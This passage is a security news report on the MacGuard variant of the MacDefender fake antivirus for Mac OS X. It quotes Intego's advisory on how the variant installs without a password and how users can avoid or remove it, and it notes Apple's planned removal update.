"Unlike the previous variants of this fake antivirus, no administrator's password is required to install this program," Intego researchers said in an advisory. "Since any user with an administrator's account -- the default if there is just one user on a Mac -- can install software in the Applications folder, a password is not needed."

The downloader then installs the new MacDefener version, MacGuard, downloaded by the avRunner application from an IP address hidden in an image file.

Intego researchers say that users should be wary of Web pages that appear to be a Finder window.

"Leave the page, and quit your Web browser. If anything has downloaded, and the Installer application has opened, quit it right away; look in your Downloads folder for the file, then delete it," Intego said.

Apple issued an advisory earlier this week warning users of the MacDefender virus , saying that "In the coming days, Apple will deliver a Mac OS X software update that will automatically find and remove Mac Defender malware and its known variants."

Security experts question how Apple will keep up with what appears to be a constant stream of MacDefender variants -- a tactic which emulates the myriad of fake antivirus attacks on the Windows platform.  

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">New MacGuard Phishing Attack Bypasses Mac OS X Password Requirement"https://www.voiceofgreyhat.com/2011/05/new-macguard-phishing-attack-bypasses.html</a>